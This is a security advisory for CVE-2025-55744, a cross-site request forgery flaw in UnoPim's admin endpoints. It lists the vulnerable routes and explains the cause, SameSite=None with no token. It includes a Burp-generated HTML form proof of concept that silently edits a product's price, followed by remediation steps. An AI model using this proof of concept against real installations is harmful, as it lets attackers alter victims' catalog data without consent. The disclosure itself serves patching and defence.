CVE-2025-55744
EPSS 0.04%UnoPim vulnerable to CSRF on Product edit feature and creation of other types
Description
### Summary Some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF). | Method | Endpoint | Status | Reason | |:------:|:------:|:------:|:------:| | POST | /admin/catalog/products/create | Not Vulnerable :white_check_mark: | `X-XSRF-TOKEN` header used | | GET | /admin/catalog/products/copy/{id}| Vulnerable :x: | Missing `X-XSRF-TOKEN` header or similar protection | | POST | /admin/catalog/products/edit/{id}| Vulnerable :x: | Missing `X-XSRF-TOKEN` header or similar protection | | POST | /admin/settings/users/create | Not Vulnerable :white_check_mark: | `X-XSRF-TOKEN` header used | The below are some of the vulnerable endpoints that allow state changing actions including but not limited to: ``` /admin/catalog/categories/create /admin/catalog/categories/edit/{id} /admin/catalog/category-fields/create /admin/catalog/category-fields/edit/{id} /admin/catalog/attributes/create /admin/catalog/attributes/edit/{id} ``` ### Details CSRF attack happens when you visit an attacker controlled website which sends a cross origin request to vulnerable application in order to perform a state changing operation like edit the price of a product without the intention of victim. In this case, the POST request doesn't need any special headers ( X-XSRF-TOKEN header missing ) and the content-type is either `application/x-www-form-urlencoded` or `multipart/form-data` so we can say this is a `Simple request` ( doesn't need preflight request ). The cookies are send because `samesite` is set to `None`. We have every ingredients for a successful CSRF attack. ### PoC 1. Go to any product and click on Edit. 2. Capture the request on Burp, right click and generate a CSRF POC ( or use the below csrf-poc.html ) 3. Access the poc.html and press submit request, the cross origin request will be send and we can see the price of the product has been changed. POC Video link: https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ `csrf-poc.html`: ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1:8000/admin/catalog/products/edit/7" method="POST" enctype="multipart/form-data"> <input type="hidden" name="_token" value="s9Egihm0RD1Pd1NxhvTrx0a4qKCdl0UTSzyyJaK5" /> <input type="hidden" name="_method" value="PUT" /> <input type="hidden" name="sku" value="SM-BL-102" /> <input type="hidden" name="channel" value="default" /> <input type="hidden" name="locale" value="en_US" /> <input type="hidden" name="values[common][sku]" value="SM-BL-102" /> <input type="hidden" name="uniqueFields[values.common.sku]" value="values[common][sku]" /> <input type="hidden" name="values[common][product_number]" value="" /> <input type="hidden" name="uniqueFields[values.common.product_number]" value="values[common][product_number]" /> <input type="hidden" name="values[channel_locale_specific][default][en_US][name]" value="test" /> <input type="hidden" name="values[common][url_key]" value="fffkk" /> <input type="hidden" name="uniqueFields[values.common.url_key]" value="values[common][url_key]" /> <input type="hidden" name="values[channel_specific][default][tax_category_id]" value="" /> <input type="hidden" name="values[channel_specific][default][tax_category_id]" value="" /> <input type="hidden" name="values[common][color]" value="" /> <input type="hidden" name="values[common][color]" value="" /> <input type="hidden" name="values[common][size]" value="" /> <input type="hidden" name="values[common][size]" value="" /> <input type="hidden" name="values[common][brand]" value="" /> <input type="hidden" name="values[common][brand]" value="" /> <input type="hidden" name="values[channel_locale_specific][default][en_US][short_description]" value="<p>fff</p>" /> <input type="hidden" name="values[channel_locale_specific][default][en_US][description]" value="<p>fff</p>" /> <input type="hidden" name="values[channel_locale_specific][default][en_US][meta_title]" value="" /> <input type="hidden" name="values[channel_locale_specific][default][en_US][meta_keywords]" value="" /> <input type="hidden" name="values[channel_locale_specific][default][en_US][meta_description]" value="" /> <input type="hidden" name="values[channel_locale_specific][default][en_US][price][USD]" value="7.777" /> <input type="hidden" name="values[channel_specific][default][cost][USD]" value="" /> <input type="hidden" name="values[common][status]" value="false" /> <input type="hidden" name="values[common][status]" value="true" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ### Impact Attacker can perform action on behalf of the victim as this happens on the victim's browser provide the victim is already authenticated to the application. Attacker can use an image tag to send the GET request such that when the page is loaded, it'll get executed. As shown in the video POC, the product information can be tampered, create new categories etc. ### Remediation: - Use CSRF token for every state changing request. - Use samesite: lax or strict, now it is set 'None'. Make sure all state changing requests are done using POST instead of GET. Noticed that for product copy feature, GET is used which means Samesite:strict needs to be set in that case. Otherwise Samesite: lax should suffice.
Affected packages (1)
- Packagist/unopim/unopimfrom 0, < 0.2.1
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P |